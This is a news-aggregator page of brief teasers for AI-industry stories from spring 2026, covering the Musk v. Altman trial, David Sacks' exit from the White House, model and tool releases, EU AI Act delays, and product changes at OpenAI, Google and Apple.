David Sacks, the venture capitalist and tech billionaire who'd become Silicon Valley's primary advocate inside the White House and a key architect of its aggressive AI policy initiatives, revealed on Thursday that he was no longer a special government employee - and therefore no longer President Donald Trump's Special Advisor on AI and Crypto. Sacks' […]

The Verge AIblog

A Coding Implementation to Run Qwen3.5 Reasoning Models Distilled with Claude-Style Thinking Using GGUF and 4-Bit Quantization

In this tutorial, we work directly with Qwen3.5 models distilled with Claude-style reasoning and set up a Colab pipeline that lets us switch between a 27B GGUF variant and a lightweight 2B 4-bit version with a single flag. We start by validating GPU availability, then conditionally install either llama.cpp or transformers with bitsandbytes, depending on […]

MarkTechPostblog

Musk’s biggest loyalist became his biggest liability

I sat down in the Musk v. Altman trial courtroom today, painfully aware that no one was going to ask Shivon Zilis the question on everyone's minds: Girl, what the fuck are you doing? Zilis, who testified under oath that she is the mother of four of Musk's children, was… what's the best way to […]

The Verge AIblog

[AINews] Everything is CLI

a quiet day lets us reflect on the growing trend of CLIs for ~everything~ agents

Latent Space (swyx)blog

A Groq-Powered Agentic Research Assistant with LangGraph, Tool Calling, Sub-Agents, and Agentic Memory: Lets Built It

In this tutorial, we build a Groq-powered agentic research workflow that runs directly using Groq’s free OpenAI-compatible inference endpoint.

MarkTechPostblog

Wikipedia cracks down on the use of AI in article writing

The site, whose policies are subject to change, has struggled with the issue of AI-generated writing.

TechCrunch AIblog

Google is making it easier to import another AI’s memory into Gemini

After Anthropic updated its tool for copying another AI's memory into Claude earlier this month, Google Gemini is rolling out new "Import Memory" and "Import Chat History" features on desktop that can help users quickly copy over everything their current AI already knows about them. To use the "Import Memory" tool, users copy and paste […]

The Verge AIblog

Apple will reportedly allow other AI chatbots to plug into Siri

Apple's iOS 27 update will allow users to choose the AI chatbot they want to link with Siri. That's according to a report from Bloomberg's Mark Gurman, who says third-party chatbots downloaded from the App Store, like Google's Gemini or Anthropic's Claude, will be able to fetch replies for Siri - similar to how the […]

The Verge AIblog

Where the goblins came from

How goblin outputs spread in AI models: timeline, root cause, and fixes behind personality-driven quirks in GPT-5 behavior.

OpenAI Blogblog

Barry Diller trusts Sam Altman. But ‘trust is irrelevant’ as AGI nears, he says.

Barry Diller defended OpenAI CEO Sam Altman, while warning that AGI remains an unpredictable force needing guardrails.

TechCrunch AIblog

Snap says its $400M deal with Perplexity ‘amicably ended’

The deal, announced last November, would have seen Perplexity's AI search engine integrated directly into Snapchat.

TechCrunch AIblog

Apple’s AI Playlist Playground is bad at music

Apple Music: "What do you want to hear?" Me: "Atmospheric instrumental black metal to write to." Apple Music: "Here's three metal songs with vocals, a field recording, an ambient electronic track, and a piece of doom jazz." I am skeptical of AI's ability to serve up the music I want to begin with, but even […]

The Verge AIblog

Is xAI a neocloud now?

xAI's real business may be more about building data centers than training AI models.

TechCrunch AIblog

Google’s AI architect lived rent-free in Elon Musk’s head

About a week into the Musk v. Altman trial, we've heard from some of the most powerful people in tech - including OpenAI president Greg Brockman, Elon Musk's fixer Jared Birchall, and Musk himself. But one of the most prominent characters is hovering around the margins: Demis Hassabis, CEO of Google DeepMind. Hassabis is the […]

The Verge AIblog

Researchers gaslit Claude into giving instructions to build explosives

Anthropic has spent years building itself up as the safe AI company. But new security research shared with The Verge suggests Claude's carefully crafted helpful personality may itself be a vulnerability. Researchers at AI red-teaming company Mindgard say they got Claude to offer up erotica, malicious code, and instructions for building explosives, and other prohibited […]

The Verge AIblog

EU backs nude app ban and delays to landmark AI rules

European lawmakers have voted to delay key parts of the EU AI Act, the bloc's flagship law for regulating artificial intelligence, while also backing proposals to ban nudify apps. The measures, approved by a large majority in the European Parliament, would push back compliance deadlines for developers of high-risk AI systems - those deemed to […]

The Verge AIblog

Google shuts down Project Mariner

Google has pulled the plug on Project Mariner, an experimental feature designed to perform tasks for you across the web, as reported earlier by Wired's Maxwell Zeff. The Project Mariner landing page now contains a message that says: "Thank you for using Project Mariner. It was shut down on May 4th, 2026 and its technology […]

The Verge AIblog

CopilotKit Introduces Enterprise Intelligence Platform That Gives Agentic Applications Persistent Memory Across Sessions and Devices

CopilotKit Intelligence adds a managed persistence layer on top of the open-source CopilotKit stack, giving agents the ability to retain context, state, and interaction history without custom storage infrastructure.

MarkTechPostblog

OpenAI shelves erotic chatbot ‘indefinitely’

OpenAI has paused plans to release a sexualized "adult mode" for ChatGPT, in its latest move to refocus on the company's core products. According to The Financial Times, the erotic chatbot has been shelved "indefinitely" after facing pushback from employees and investors due to the problematic and harmful effects sexualized AI content can have on […]

The Verge AIblog

How David Sacks crashed and burned in the White House

Hello and welcome to Regulator, a newsletter exclusively for Verge subscribers about tech, politics, and Washington intrigue. (It's basically House of Cards, but for nerds.) Not a subscriber yet? You really should become one, and to save you a Google search, here is the direct link to do so! And do you think I should […]

The Verge AIblog

Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use

The landscape of open-source artificial intelligence has shifted from purely generative models toward systems capable of complex, multi-step reasoning. While proprietary ‘reasoning’ models have dominated the conversation, Arcee AI has released Trinity Large Thinking. This release is an open-weight reasoning model distributed under the Apache 2.0 license, positioning it as a transparent alternative for developers […]

MarkTechPostblog

Google’s ‘live’ AI search assistant can handle conversations in dozens more languages

Google is expanding access to Search Live, a feature that lets you search for information using your voice and camera. The AI search assistant is now available in more than 200 countries and territories, as well as dozens of languages, according to an announcement on Thursday. Search Live rolled out broadly in the US last […]

The Verge AIblog

OpenAI abandons yet another side quest: ChatGPT’s erotic mode

It's only the latest of several side projects that the AI startup has ditched over the past week.

TechCrunch AIblog

OpenAI’s president does ‘all the things,’ except answer a question

The strongest witness for Elon Musk's case against OpenAI so far has been Greg Brockman's journal. Brockman himself is running as a close second. Brockman was called to the stand in a rather unusual way - he was cross-examined first, followed by a direct examination - and he had some serious high school debate club […]

The Verge AIblog

Data centers get ready — the Senate wants to see your power bills

Senators Josh Hawley and Elizabeth Warren want the Energy Information Administration to gather more details about how data centers use power — and how that affects the grid.

TechCrunch AIblog

Granite 4.1 LLMs: How They’re Built

Hugging Face Blogblog

My Workflow for Understanding LLM Architectures

A learning-oriented workflow for understanding new open-weight model releases

Sebastian Raschkablog

Building the compute infrastructure for the Intelligence Age

OpenAI scales Stargate to build the compute infrastructure powering AGI, adding new data center capacity to meet growing AI demand.

OpenAI Blogblog

How Elon Musk left OpenAI, according to Greg Brockman

Cutthroat negotiations between startup founders are rarely shared so publicly, especially when a company becomes as world-changing as OpenAI.

TechCrunch AIblog

